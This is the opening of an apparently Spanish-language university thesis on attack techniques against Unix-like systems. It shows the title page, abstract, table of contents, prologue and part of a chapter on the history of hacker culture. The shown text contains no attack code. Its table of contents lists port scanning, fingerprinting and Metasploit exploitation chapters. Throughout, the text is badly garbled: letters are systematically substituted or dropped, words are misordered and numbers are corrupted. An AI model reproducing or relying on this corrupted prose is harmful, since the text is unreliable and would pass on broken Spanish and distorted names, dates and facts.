Técnicas comunes de Ataque a equipos con sistema operativo Unix o derivados

Autor: Marcelo Fidel Fernández Director: Javier Blanqué

Universidad Nacional de Luján Int. Ruta !" #"$$ Luján% &uenos Aires Rep'(lica Ar)entina A*o +$$,

Esta obra está licenciada bajo una Licencia Atri(uci-n.No /omercial. /ompartir 0(ras Derivadas I)ual 2.5 Argentina de Creative Co ons. !ara ver una co"ia de esta licencia# visite $tt"%&&creativeco ons.org&licenses&b'( nc(sa&2.5&ar& o env)enos una carta a Creative Co ons# *+* ,econd ,treet# ,uite -..# ,an Francisco# Cali/ornia# 01*.5# 2,A.

Técnicas comunes de Ataque a equipos con sistema operativo Unix o derivados

1arcelo 2ernánde3 Universidad Nacional de Luján Int. Ruta !" #"$$ Luján% &uenos Aires Rep'(lica Ar)entina arcelo./idel./ernandez3g ail.co

"Si la depuración es el proceso de eliminar errores, entonces la programación debe ser el proceso de introducirlos" Edsger 4. 5ij6stra

7

Resumen
El "resente trabajo trata de brindar un "anora a acerca de las técnicas ás co unes de obtenci8n de in/or aci8n re ota en /or a activa ' "asiva# detecci8n de vulnerabilidades ' "osterior ente una introducci8n al ataque en entornos ti"o 2ni9# co o :inu9 ;5ebian# 2buntu# <ed =at# Fedora# ,use# Mandriva# etc.># B,5 ;FreeB,5# ?"enB,5# @etB,5># ,olaris# A7A# =!(2A# ,C? 2ni9# etc. En el !ri er Ca")tulo se $ace una reseBa de la $istoria del Movi iento =ac6er# una co unidad nueva e interconectada# surgida al junto al desarrollo de la in/or ática nuestros d)as# is o tie "o que ' is a. :uego se describen los diversos

/actores tecnol8gicos ' circunstancias adicionales que alteraron su recorrido $asta o ento en que se "odr)a decir que está en todo su es"lendor. ,eguido de esto# se describe un "oco la situaci8n global de la C,eguridad 7n/or áticaD $o' en d)a# su relaci8n con la Etica =ac6er ' la "ráctica del =ac6ing Etico co o una /or a de vida dentro de la Co unidad =ac6er. En el Fercer Ca")tulo se "lantean un conjunto de eta"as co o t)"icas# o que nor al ente se llevan adelante# antes ' des"ués de e/ectuar un ataque a la seguridad in/or ática de una organizaci8n# con el /in de que tenga "robabilidades de é9ito "ri ero ' "resenta la "ri era ' a9i izar las consecuencias luego. a'ores

:os ca")tulos siguientes "oseen una neta orientaci8n técnica. El Cuarto ás e9tendida /or a de reco"ilaci8n activa de in/or aci8n ás re ota% el Cescaneo de "uertosD o CPort ScanningD. ,e introducen una serie de variantes o ti"os de escaneo# los cuales se encuentran en la $erra ienta que se inclu'en ca"turas del trá/ico de la red a odo de eje "lo. "o"ular# @ a"# detallando el /unciona iento te8rico ' "ráctico de cada una# 'a El Ca")tulo 5 e9"lica otras /or as de reconoci iento re oto# co o ser la detecci8n de un ,iste a ?"erativo en base a su "ila de "rotocolos FC!&7!# lla ado ?, Finger"rinting# en su versiones activa# "asiva ' otras utilizadas. Fa bién se desarrollan algunas técnicas aGn Enu eraci8n de ,ervicios ' el Finger"rinting de A"licaciones. El ,e9to Ca")tulo recorre algunas $erra ientas "ara a"licar ' a "liar aGn ás la teor)a de los dos ca")tulos anteriores% @etcatH o"ciones avanzadas de @ a" co o su otor de scri"tingH "ort scanners alternativos co o 2nicornscan ' uestra de las ,canrand# ' un packet crafter co o ="ing es s8lo una in/or áticos.
77

enos

ás intrusivas# co o la

"osibilidades que tienen los intrusos ;legales o no> /rente a los siste as

!or Glti o# el Ca")tulo + /inal ente describe el ataque ' acceso a un equi"o re oto# ade ás de $acer una introducci8n un so/tIare es"ecial ente creado "ara el desarrollo ' creaci8n de e9"loits# lla ado Metas"loit Fra eIor6. :a utilidad del Ane9o A se reduce en tener a objetivo de re/rescar la ano la docu entaci8n ás i "ortante de los "rotocolos con los que se trabaja% 7!# FC!# 25! e 7CM!# con el e oria en caso de duda o desconoci iento "or "arte del lector. El Ane9o B describe con bastante detalle ' "recisi8n las ca"turas realizadas ' utilizadas en los Ca")tulos 1 ' J. El Ane9o C se des"rende ' "ro/undiza un "oco ás el Ca")tulo 5# abriendo las "uertas a la colaboraci8n con el "ro'ecto @ a" cuando no reconoce una /ir a de un ,?H de "aso# ta bién sirve co o re/erencia de bajo nivel sobre qué "ará etros son Gtiles "ara la detecci8n activa de un stac6 FC!&7! re oto. El Ane9o 5 "er ite obtener ás detalles sobre los e9"loits utilizados en el Ca")tulo +. K el Ane9o E es un co "endio de los tér inos# siglas ' acr8ni os utilizados# e9"licando su signi/icado ' o/reciendo las re/erencias corres"ondientes. 4ala(ras /laves: ,eguridad# :inu9# 2ni9# ,eguridad de la 7n/or aci8n# =ac6ing# Crac6ing# E9"loits# Finger"rinting# !ort ,canning

777

A)radecimientos
Agradezco "ro/unda ente a toda la gente que grati/icante ca ino de estudiante universitario. e rode8 durante estos aBos

de estudio% /a ilia# docentes# a igos ' co "aBeros con los que recorr) el largo '

7L

5ndice de /ontenido
<esu en..........................................................................................................!ág. 77 Agradeci ientos............................................................................................!ág. 7L !r8logo...........................................................................................................!ág. 7A Ca")tulo *. 7ntroducci8n e =istoria de los $ac6ers..........................................!ág. * *.*. :os !rogra adores Cde LerdadD..........................................................!ág. * *.2. :os dorados MJ. ( El co ienzo de la cultura $ac6er.............................!ág. 2 *.-. :os aBos M+. N :a Cultura de las !5!(*..............................................!ág. 5 *.1. A"arecen 2ni9 ' las *.5. :as inico "utadoras...............................................!ág. J icroco "utadoras% Co "utadoras !ersonales..........................!ág. **

*.J. :os aBos MO.# M0. ' el F:?,,............................................................!ág. ** Ca")tulo 2. El Ataque de siste as in/or áticos............................................!ág. *1 2.*. El @egocio de la ,eguridad en la Actualidad.....................................!ág. *1 2.2. El =ac6ing Etico................................................................................!ág. *1 Ca")tulo -. Eta"as F)"icas de un Ataque.......................................................!ág. *+ -.*. !lani/icaci8n ' elecci8n del objetivo..................................................!ág. *O -.2. ?btenci8n de in/or aci8n..................................................................!ág. *O -.2.*. 5esde /uera de la organizaci8n...................................................!ág. *0 -.2.2. 5esde dentro de la organizaci8n.................................................!ág. 2. -.2.-. 7ngenier)a ,ocial.........................................................................!ág. 2* -.-. BGsqueda ' rastreo de vulnerabilidades.............................................!ág. 22 -.-.*. Acceso :ocal..............................................................................!ág. 22 -.-.2. Acceso <e oto. Enu eraci8n de ,ervicios...............................!ág. 2-.1. Buscando el Anoni ato en la red.......................................................!ág. 2J -.1.*. <edes ' ,iste as An8ni os.......................................................!ág. 2J -.1.2. 2tilizaci8n de MalIare...............................................................!ág. 2+ -.5. Ataque e 7ntrusi8n..............................................................................!ág. 2O -.5.*. Ma"eo de Lulnerabilidades........................................................!ág. 2O -.5.2. E9"lotaci8n e intrusi8n...............................................................!ág. -. -.J. !uertas traseras ' Eli inaci8n de $uellas..........................................!ág. -* -.+. Atacar otro siste a.............................................................................!ág. -* Ca")tulo 1. !ort ,canning..............................................................................!ág. -1.*. Método de Funciona iento ' ?bjetivos............................................!ág. -1.2. Estados de un !uerto..........................................................................!ág. -1
L

1.2.*. !uerto Abierto ;C?"en !ortD>.....................................................!ág. -1 1.2.2. !uerto Cerrado ;CClosed !ortD>..................................................!ág. -J 1.2.-. !uerto Filtrado o Bloqueado ;CFilteredD>...................................!ág. -O 1.-. Fi"os de !ort ,canning en @Ma".......................................................!ág. 1. 1.-.*. ,'n ,can.....................................................................................!ág. 1* 1.-.2. Connect ,can..............................................................................!ág. 12 1.-.-. Ac6 ,can.....................................................................................!ág. 11 1.-.1. 4indoI ,can..............................................................................!ág. 1+ 1.-.5. 25! ,can....................................................................................!ág. 1+ 1.-.J. Mai on# @ull# Fin ' A as ,can................................................!ág. 1O 1.-.+. 7dle ,can.....................................................................................!ág. 5* 1.-.O. FF! Bounce ,can.......................................................................!ág. 5O 1.-.0. Escaneo de !rotocolos 7!............................................................!ág. J1 1.-.*.. Fi"os de escaneo% <esu en......................................................!ág. J5 Ca")tulo 5. ?tras Fécnicas de <econoci iento Activo.................................!ág. JJ 5.*. 5etecci8n del ,iste a ?"erativo% ?, Finger"rinting........................!ág. JJ 5.*.*. 5etecci8n Activa........................................................................!ág. JJ 5.*.2. 5etecci8n !asiva.........................................................................!ág. +2 5.*.-. ?tras técnicas de Finger"rinting.................................................!ág. +5 5.2. Enu eraci8n de ,ervicios..................................................................!ág. ++ 5.2.*. Banner Prabbing.........................................................................!ág. ++ 5.2.2. Finger"rinting de A"licaciones...................................................!ág. +0 5.2.2.*. A a"...................................................................................!ág. O. 5.2.2.2. @ a"...................................................................................!ág. OCa")tulo J. ,o/tIare "ara <econoci iento Activo........................................!ág. O+ J.*. @etcat..................................................................................................!ág. O+ J.2. @ a" N Más ?"ciones.......................................................................!ág. 02 J.2.*. 5eco's ;o C,eBuelosD>................................................................!ág. 02 J.2.2. Evitando FireIalls......................................................................!ág. 01 J.2.-. 7nter/az Prá/ica ( Qen a"..........................................................!ág. 0J J.2.1. Motor de ,cri"ting%.....................................................................!ág. 0+ J.-. 2nicornscan......................................................................................!ág. *.. J.1. ,canrand...........................................................................................!ág. *.2 J.5. Mani"ulaci8n de !aquetes% ="ing....................................................!ág. *.5 Ca")tulo +. E9"lotaci8n de un ?bjetivo.......................................................!ág. **2
L7

+.*. El !ro'ecto Metas"loit.....................................................................!ág. **1 +.*.*. Esque a de Funciona iento....................................................!ág. **5 +.*.2. Arquitectura ' Co "onentes....................................................!ág. **+ +.*.-. 7nter/aces de 2suario................................................................!ág. *2* +.2. Eje "los de Ataques con E9"loits...................................................!ág. *25 +.*.*. Atacando ,a ba con Metas"loit..............................................!ág. *25 +.*.2. E9"lotando un ,ervidor FF!....................................................!ág. *2O +.-. Enlaces 2tiles...................................................................................!ág. *-. Ane9o A. !ila de !rotocolos FC!&7!...........................................................!ág. *-2 A.*. !rotocolo 7!v1 ( Encabezado..........................................................!ág. *-2 A.2. !rotocolo FC! N Encabezado%.........................................................!ág. *-A.-. !rotocolo 25! N Encabezado.........................................................!ág. *-1 A.1. !rotocolo 7CM! N Encabezado........................................................!ág. *-5 A.5. FC! N 5iagra a de Fransici8n de Estados.....................................!ág. *-J Ane9o B. Acerca de las Ca"turas de Frá/ico...............................................!ág. *-+ B.*. ,cri"ts "ara !rocesar las Ca"turas...................................................!ág. *-+ B.2. :as Ca"turas en 5etalle...................................................................!ág. *1. B.2.*. Ca"tura *% !uerto Abierto........................................................!ág. *1. B.2.2. Ca"tura 2% !uerto Cerrado........................................................!ág. *1* B.2.-. Ca"tura -% !uerto 25! Cerrado...............................................!ág. *1* B.2.1. Ca"tura 1% !uerto Filtrado........................................................!ág. *1* B.2.5. Ca"tura 5% Connect ,can..........................................................!ág. *12 B.2.J. Ca"tura J% ACR ,can...............................................................!ág. *12 B.2.+. Ca"tura +% ACR ,can Filtrado.................................................!ág. *1B.2.O. Ca"turas O% Fin# Mai on# @ull ' A as ,cans.........................!ág. *1B.2.O.* Fin ,can.............................................................................!ág. *1B.2.O.2 Mai on ,can.....................................................................!ág. *11 B.2.O.- @2:: ,can........................................................................!ág. *11 B.2.O.1 A as ,can.........................................................................!ág. *15 B.2.0. Ca"tura 0 a **% 7dle ,can.........................................................!ág. *1J B.2.*.. Ca"tura *-% FF! Bounce ,can...............................................!ág. *5* B.2.**. Ca"tura *1% FF! Bounce Err8neo..........................................!ág. *5J B.2.*2. Ca"tura *1B% 7! !rotocol ,can..............................................!ág. *50 B.2.*-. Ca"tura *5% ,K@ ,can con 5eco's.......................................!ág. *JO B.2.*1. Ca"tura *J% Covert C$annel 7CM!........................................!ág. *+2
L77

Ane9o C. Análisis de una /ir a FC!&7!......................................................!ág. *O5 Ane9o 5. C8digo /uente de los E9"loits 2tilizados....................................!ág. *O0 Ane9o E. Plosario de Fér inos...................................................................!ág. *02 Bibliogra/)a..................................................................................................!ág. *05

L777

!r8logo

4r-lo)o
Este trabajo surge co o consecuencia del grán interés que tengo "or la seguridad in/or ática "or un lado ' la ad iraci8n $acia la co unidad $ac6er "or el otro. =o' en d)a# 7nternet "er ite que una gran asa de "ersonas# entusiastas de las Cnuevas tecnolog)asD# vuelquen in/or aci8n e interactGen con ella en /or a constante e ininterru "ida# gracias a los "rogra as de so/tIare. !ero la entable ente# son "ocos los que re/le9ionan que este nuevo de co unicaci8n es di/erente a los de ás# "ara bien ' "ara cada vez necesitan de de /or a edio al. :os errores de

"rogra aci8n que antes s8lo "rovocaban "roble as aqu) ' allá en /or a aislada# a'or cuidado# 'a que su dise inaci8n crece en /or a ás so/tIare# "ara ás consu idores# ' ás di/)ciles de anejo global ' e9ageradaH cada vez se escribe ás integrada con la red.

:os es/uerzos "or detener los "roble as son cada vez

costear# sobrellevar ' a/rontar# ' en consecuencia# $o' e9iste todo un gran ercado global ;l)cito ' del otro> alrededor de las vulnerabilidades en el de la in/or aci8n de esa gran asa.

Es "or esto que creo que no es casual el enor e creci iento del ,o/tIare :ibre ;F:?,,> en estos Glti os aBos. ,u /unda ento en la C/iloso/)a $ac6erD# su de/ensa de los estándares abiertos# ' la de/ensa de los derec$os del usuario en el anejo de la in/or aci8n está e9"andiéndose co o alternativa# /rente a un odelo que co o está quedando de ostrado# tiene uc$as /allas. ás co unes "ara Este trabajo es un breve recorrido de los "rocedi ientos

analizar "ri ero ' a"rovec$arse des"ués de estos errores# ca ino que los $ac6ers $an sabido transitar ' desarrollar en /or a e9clusiva# con el objetivo de /o entar la inacabable cultura del conoci iento.

Aclaraci-n% :as técnicas de ataque e9"uestos en este trabajo son s8lo una reco"ilaci8n a ?rganizaciones# Entidades ' E "resas "ueden o no contener datos ver)dicos o del cu'o caso a/ir ativo será aclarado o"ortuna ente.

odo de

eje "lo ' no "retenden ser co "letos. :a in/or aci8n "resentada co o "roveniente de undo real# en

7A

Ca")tulo *. ( Ca")tulo *. 7ntroducci8n e =istoria de los $ac6ers

/ap6tulo 7. Introducci-n e 8istoria de los 9ac:ers
*.*. :os !rogra adores Cde LerdadD
:a $istoria de los $ac6ers se re onta a "rinci"ios de la década de *05.# en la "re$istoria de la co "utaci8n# con el surgi iento de los CProgramadores de VerdadDSE<==T. Estos e9"ertos# "rovenientes de corrientes acadé icas co o la /)sica# ingenier)a ' $asta algunos radioa/icionados# se dese "eBaban co o "rogra adores intensa ente a"asionados ' entusiastas de las ciencias de la co "utaci8n# sobre las "ri eras co "utadoras digitales. Estas donde co "utadoras $abitaban en in ensos salones áquinas co o la E@7AC
2

;con *J+ en *01J># segundo*#
S47R7UE@T

# 2+ Foneladas ' *5. realizaban unos 5... "ara ;ver
2

R4 de consu o# dada a conocer cálculos si "les ;su a ' resta> "or uso 7lustraci8n ilitar *>.
7lustraci8n * ( Co "utadora E@7AC

!osterior ente# ;ocu"aba -5

la 2@7LAC 7 # lanzada al

ercado en *05*># "ri era co "utadora digital is os creadores de la

estadounidense de uso co ercial# /ue el /ruto de los

anterior# Jo$n Mauc$l' ' Jo$n !res"er Ec6ert# ésta s)# dando co ienzo a una ola de aconteci ientos que ter inar)an en la co "utaci8n tal co o la conoce os.

7lustraci8n 2% :)nea de Fie "o ( !rogra adores de Lerdad * !ara dar una idea de su velocidad de cálculo# un "rocesador de !C reciente ;"or eje "lo un 7ntel Core 2 Vuad de - P=Q># "uede realizar decenas de segundo. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. * de 2*. iles de illones de o"eraciones "or

Ca")tulo *. ( *.*.:os !rogra adores Cde LerdadD

5ic$as

áquinas eran e9cesiva ente grandes# lentas ' "esadas. :a entrada edio de tarjetas "er/oradas# que $ac)a que los centros

de datos deb)a $acerse "or

de c8 "utos ar aran largas CcolasD de "rogra as a ejecutarH si el "rogra a /allaba# el "rogra ador deb)a arreglar el "roble a ' volver a la CcolaD. Esto $ac)a u' burocrático ' di/)cil el acceso real a la co "utadora# lo cual desani aba ' quitaba entusias o de utilizarlas al co Gn de los "rogra adores# cient)/icos ' acadé icos. A "esar de ello# en estos "ri eros "asos de la co "utaci8n# programadores de verdad co o los creadores de la E@7AC ' la 2@7LAC# o ta bién ,e' our Cra'2# comen3aron a desarrollar una incipiente cultura propia# con ter inolog)as# que se re/lej8 "or eje "lo en varias largas listas de C:e'es de Mur"$'D S47R7UM!=KT .

*.2. :os dorados MJ. ( El co ienzo de la cultura $ac6er
:a cultura $ac6er tiene sus ra)ces en el M7F# ás "recisa ente en la uc$a subco isi8n de ,eBales ' Energ)a del Club Fecnol8gico de Modelos de Frenes-. Algunos de los integrantes de dic$o subco ité eran "ersonas de inteligencia# ca"acidad ' talento# que a aban a"render cada vez "ri eras co "utadoras que "od)an ec$ar ás de todo

aquello que les interesara# "or "ura diversi8n ' curiosidad# desde aquellas ano $asta conocer al dedillo el siste a tele/8nico del edi/icio# aGn a costa de sus relaciones sociales ' "ersonales. !ri ero con la FA(. S47R7UFA.T# ' luego ta bién en *0J*# cuando la instituci8n adquiri8 la "ri er !5!(*# dic$os estudiantes ;Bob ,aunders# !eter ,a son# Alan Roto6# ' otros># convirtieron estas áquinas ' sus sucesoras de la l)nea !5! S47R7U!5!T de 5EC1 en su "asatie "o "re/erido# donde desarrollaron so/tIare# $erra ientas de "rogra aci8n# un lenguaje in/or al# "ro"io# ' "or /in# una cultura% con ética ! c-di)os# cu'a $uella deja su :a arca $asta nuestros d)as. a'or)a de los tér inos originados en esta é"oca están registrados en el

2 ,e' our Cra' ;*025(*00J> /ue un "ionero de la in/or ática# ' es considerado el C!adre de la ,u"erco "utaci8nD. !as8 su vida diseBando equi"a iento co "utacional a grandes escalas# ' es el inventor de un gran nG ero de tecnolog)as "atentadas "ara las e "resas que él trabajaba. :uego de un dese "eBo brillante en éstas# /und8 Cra' Cor"oration en *0+2# la "rinci"al /ir a /abricante de su"erco "utadoras durante dos décadas ' 1 !5! de 5EC% !rogra edia. SC<AKT S?BUC<AKT itee. - FM<C N Fec$ Model <ailroad Club# ,ignals and !oIer Co

ed 5ata !rocessor# de 5EC N 5igital Equi" ent Cor"oration.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2 de 2*.

Ca")tulo *. ( *.2.:os dorados MJ. ( El co ienzo de la cultura $ac6er

Jargon File5 SE<JFT # un docu ento que "retende reco"ilar el signi/icado del slang# o lenguaje e9clusiva ente $ac6er. El tér ino hacker "roviene de esta eta"aH si bien original ente quiere decir Calguien quien $ace $ac$aD# se encuentra aqu) SE<JF=T descri"to co o% 7. C2na "ersona que dis/ruta e9"lorar los detalles de los siste as ' e9"ri ir sus ca"acidades# al contrario de la a'or)a de sus usuarios.D +. CAlguien que "rogra a de /or a entusiasta ;$asta obsesiva>.D ;. C2na "ersona ca"az de a"reciar el valor del $ac6eo.D <. C2na "ersona que es buena "rogra ando rá"ida ente.D . C2n e9"erto en un "rogra a en "articular# o alguien que /recuente ente trabaja con él o en élH co o "or eje "lo# un Hacker UnixD. #. C2n e9"erto o entusiasta de cualquier ti"oH alguien "uede ser un $ac6er de la astrono )a# "or eje "lo.D ". CAlguien que dis/ruta el desa/)o intelectual de su"erar o sortear las li itaciones de /or a creativaD. ,. CEl tér ino acker ta bién tiende a connotar a$ora>. Co o se "uede ver# un di/undida entre la gente "or los acker nada tiene que ver con la visi8n edios ás asivos de co unicaci8n# la del Cladr8n ás bien relacionadas con el uso ás di/usa e bres)a en la co unidad global de/inida "or la redD ;re/iriéndose a A<!A@et "ri ero e 7nternet uebles con un

cibernéticoD# que dis/ruta ingresando a siste as sin "er iso "ara robar datos. ,i bien un $ac6er dis/ruta de $acer cosas que están no co Gn de los siste as# o considera los l) ites legales de una /or a sus ecanis os de seguridad "ara luego

o CrelajadaD ;s8lo "orque es bueno saber todos los detalles de un siste a ' sortear ejorarlos># la intenci-n del 9ac:er no es ro(ar in=ormaci-n o causar da*o al)uno. !ara aquellos que s) lo $acen# los $ac6ers inventaron otro tér ino% cracker. !ara /inalizar# dada la de/inici8n de acker# <a' ond escribe% C=a' una co unidad# una cultura co "artida de "rogra adores e9"ertos ' agos de las redes in/or áticas que recorren la $istoria $acia atrás varias décadas# $asta la "ri er co "utadora de tie "o co "artido ' los "ri eros e9"eri entos de la A<!A@et. :os ie bros de esta cultura dieron origen al tér ino M$ac6erM. :os $ac6ers constru'eron la 7nternet. :os $ac6ers $icieron el siste a o"erativo 2ni9
5 F$e Jargon File% El CArc$ivo de la JergaD. Fa bién deno inado CEl 5iccionario =ac6erD. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. - de 2*.

Ca")tulo *. ( *.2.:os dorados MJ. ( El co ienzo de la cultura $ac6er

lo que es $o'. :os $ac6ers ejecutaron la 2senet. :os $ac6ers $icieron la 4orld 4ide 4eb /uncionar. ,i usted es "arte de esta cultura# si usted contribu'8 a ella ' otras "ersonas en ella saben quién es usted ' lo lla an un $ac6er# entonces# usted es un $ac6er.D SE<B=T Lolviendo a esta !poca dorada de los ackers SEB=:T# $a' que re arcar que s-lo =ue movili3ada ;' $asta "osible> por nota(les cam(ios en la tecnolo)6a de la co "utaci8n. Co o se dijo anterior ente# $asta ese donde "rogra arlas era bastante tedioso# 'a que una "rogra a escrito ;en un lenguaje de o ento las co "utadoras eran utilizadas "ara ejecutar inter inables "rocesos "or lotes# )ni a equivocaci8n en el áquina u' bajo nivel> $ac)a que todo el

"rocedi iento /allara. Cuando a"areci8 la FA(. ;la "ri era

transistorizada# una de las "ri eras con una salida en /or a de i agen SCMUFA.T> ' las "ri eras co "utadoras !5! de 5EC# todo ca bi8# 'a que estas co "utadoras "ro"on)an una o"eraci8n más interactiva# que "od)an CtocarD ;ten)a una áquina de escribir eléctrica ada"tada "ara entrar datos a la áquina>. As) ' todo# la e9igua cantidad de con que contaban estas ingenio "ara lograr ejores "rogra as con e oria ' ca"acidad de "rocesa iento u' "ocos recursos dis"onibles. Es as)

áquinas# $ac)a que los "rogra adores a"licaran todo su

co o nacieron los "ri eros acks ;no olvide os que se buscaba CrecortarD o >9ac9ar? el consu o de Co o estas "ri eras e oria '&o "rocesa iento> en los "rogra as ' luego# áquinas de c8 "uto# el ovi iento e interés "or el tér ino acker /ue i "oniéndose "or decantaci8n. ellas se e9"andi8 ' no s8lo tuvo su es"lendor en el A7:ab del M7F# sino ta bién en la 2niversidad de ,tand/ord ;,A7:J> ' en la Carnegie(Mellon+# donde se /or aron ABos ás centros de cultura $ac6er e investigaci8n. ás tarde# con la creaci8n de la red de co unicaciones A<!A@et

;*0J0># estos centros de investigaci8n# original ente divididos# co enzaron a uni/icarse# a tener conciencia "ro"ia ' =uncionar como una comunidad% como una >tri(u?. Esto los /ortaleci8 aGn avances tecnol8gicos "er anente ente. El interca bio de in/or aci8n# el trabajo en conjunto entre laboratorios ' universidades $izo que todo el ovi iento en s) se "otenciara en las siguientes ás ' "ro/undiz8 su alcance# logrando

J ,A7:% ,tand/ord Arti/icial 7ntelligence :aborator'. + CM2% Carnegie(Mellon 2niversit'. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1 de 2*.

Ca")tulo *. ( *.2.:os dorados MJ. ( El co ienzo de la cultura $ac6er

décadas. Todo el so=t@are que escri(6an% el conocimiento que pose6an% todo era compartido% modi=icado ! mejorado a través del li(re intercam(io de in=ormaci-n. Tanto el so=t@are como los conocimientos eran li(res. Fa bién dio origen a actividades lGdicas relacionadasH las "ri eras listas de c$istes# lenguaje slang# discusiones éticas# el interés "or la ciencia /icci8n# todo eso ' /loreci8 natural ente "or la red que los conectaba. ás

*.-. :os aBos M+. N :a Cultura de las !5!(*.
A edida que la sociedad de los $ac6ers ' e9"ertos de la co "utaci8n u' inico "utadoras !5! de 5ECOS5EC(4EBT áquinas enor es># al ser uc$o ás evolucionaba# la tecnolog)a ta bién los aco "aBaba a la "ar% ellos estaban unidos e identi/icados con la serie de
S!5!U!:AT.

Estas

áquinas ;que no se lla aban Cco "utadorasD "orque en ese interactivas# /ueron adquiridas "or

entonces se asociaba ese tér ino con c$icas# "otentes# relativa ente baratas e

uc$)si as universidades ;ver 7lustraci8n -# SE<==T# "ág. ->.

7lustraci8n -% !ri er

odelo de la !5!(*.# en su con/iguraci8n

ás co "leta.SC2=7T

Es "or esto que las !5! ' sus $ac6ers Cco"aronD la A<!A@etH siendo la cultura de la !5!(*. S!5!*.(!<MTS!5!*.(4ebT la enor edida las !5!(+ ' !5!(O>. ás relevante de esa é"oca ;' en

Es entonces donde los distintos ;"ero interconectados> nGcleos de actividad $ac6er ' sus !5!(*. co enzaron a interesarse "or di/erentes l)neas de
O 5EC% 5igital Equi" ent Cor"oration Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5 de 2*.

Ca")tulo *. ( *.-.:os aBos M+. N :a Cultura de las !5!(*.

investigaci8n ' desarrollo de la co "utaci8n%

El A7:ab del M7F desarroll8 un siste a o"erativo alternativo "ara el !5!( *. deno inado ITA ;7nco "atible Fi es$aring ,'ste
S47R7U7F,T>#

a

di/erencia del que integraba 5EC ;el F?!,(*. S47R7UF?!,*.T># ' ten)a un objetivo claro% desarrollar ' utilizar dentro del laboratorio un siste a de tie "o co "artido "ro"io# a9i izando la e/iciencia del $ardIare ' los usuariosS7F,UM7FT. Ade ás de $acer las cosas Ca su /or aD# este siste a o"erativo "er iti8 que los $ac6ers del M7F desarrollaran una serie de avances sin "recedentes% el editor E acs# el lenguaje :7,!# ' innovaciones revolucionarias en el 7F, re otos# is o# uc$as ás avanzado res"ecto de

otros ,iste as ?"erativos de aquel entonces# co o ,iste as de arc$ivos anejo de "rocesos so/isticado# so"orte de tie "o real # etc. Fodo este conoci iento te8rico ' trabajo de aBos /ue llevado a uc$)si os siste as# ' "er anece en uso $asta $o' en d)aH sin e bargo# el 7F, en s) estaba escrito en lenguaje de !5!(*.# ' estaba atado a su destino.

áquina ;asse bler> "ara la

:os $ac6ers del ,A7: /ueron claves en el desarrollo de lo que $o' es la co "utadora "ersonal ' en la inter/az de so/tIare orientada a la ventana&)cono& ouse. S,A7:UM2,T En el CM2 ientras tanto# se llevaron adelante los "ri eros siste as

e9"ertos ' robots con destino industrial.

Fa bién /ueron i "ortantes los avances logrados "or los $ac6ers del !A<C0SA!A<C4EBT%
• • • •

El

ouse# la inter/az del so/tIare orientado a CventanasD.

:a i "resora láser. :as redes de área local. Muc$o ás# ta bién re/erente a las co "utadoras "ersonales de $o'.

*.1. A"arecen 2ni9 ' las

inico "utadoras

Mientras en *0J0 la A<!A@et nac)a# Ren F$o "son e "ez8 a "rogra ar "ara Bell :abs un siste a o"erativo que "oco a "oco /ue ree "lazando en cuanto a /uncionalidades al 1ultics S47R7UM2:T. El desarrollo de Multics /ue iniciado en *0J5# ' ten)a co o objetivo ser Cun sistema de computación de tiempo
0 !A<C% !alo Alto <esearc$ Center N Aero9 7nc. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. J de 2*.

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

compartido para mainframes, robusto, interactivo, siempre en l"nea, para cual#uier finalidad, #ue pudiera soportar muc os usuarios a la ve$D ;' /inanciaban el "ro'ecto*. no alcanz8 los objetivos deseados# ' de esa cancelado en abril de ese aBo SM2:UF7METSM2:U=7,T. El resid)a en su costo% Multics era u' altos**. Ren conoc)a bien al Multics ;/ue "arte de su equi"o de trabajo> ' si bien en "ri era instancia se "ro"uso s8lo crear un siste a de arc$ivos "ara su
*2

ás

objetivos aGn# ver SM2:U7@F<?TSBE::T>. !ero "ara las organizaciones que anera /ue otivo de dic$a decisi8n

u' co "lejo ' sus requeri ientos de $ardIare

anejo en ás

la cinta de "a"el de la !5!(+# "oco a "oco /ue i "le entando $erra ientas "ara "oder ejecutarse a s) is o# etc.

/uncionalidades "ro"ias de un siste a o"erativo co "leto% un s$ell # un editor# Cuando se le uni8 5ennis <itc$ie el "ro'ecto cobr8 i "ulso ' luego Brian Rernig$an# otro gran colaborador# le "uso el no bre Unix en clara re/erencia a la co "lejidad de Multics*- ' la "roble as. Al "oco tie "o el gru"o de desarrollo obtuvo una /la ante !5!(**S!5!**(
=BRT#

anera si "le de 2ni9 "ara resolver los

is os

' co enzaron el trabajo de "ortar 2ni9 a este $ardIare# co o $erra ienta

de desarrollo e investigaci8n. :a "ri era versi8n de 2ni9 /ue escrita en lenguaje ensa blador# "ero la clave del gran é9ito "osterior de este siste a o"erativo se bas8 en que su c8digo /uente /ue reescrito en el lenguaje C# creado es"ec)/ica ente "ara esta tarea. 5esde que co enz8 su /abricaci8n# cada versi8n de la serie !5! tuvo di/erentes arquitecturas# juegos de instrucciones# ' di/erentes objetivos dentro del ercado. En "articular# las !5!(*. ' !5!(**# si bien sus no bres sugieren que uno era un diseBo evolutivo del otro# en realidad# eran completamente di=erentes% uno era de -J bits ' el otro de *J bits# res"ectiva ente# ' sus arquitecturas eran u' distintas. Es "or eso que la elecci8n de "ortar 2ni9 a la uc$o des"ués# co o se verá ás adelante. !5!(** tuvo sus consecuencias

*. Financiaban el "ro'ecto de Multics% Bell Fele"$one :abs# el !ro'ecto MAC del M7F ' el de"arta ento de co "utaci8n de Peneral Electric. ** AGn as)# Multics sigui8 siendo desarrollado# i "le entado ' utilizado "or *2 Ler Plosario% ,$ell# "ág. *01. C ulti"le9adoD de Multics S47R7UM2:T Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. + de 2*. uc$os aBos ás.

*- :a 2 de 2ni9 se dice que "roviene de Cuni"le9adoD o CGnicoD# en clara o"osici8n a

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

A esta altura ;segunda

itad de la década del M+.># la A<!A@et era

uc$o ás de

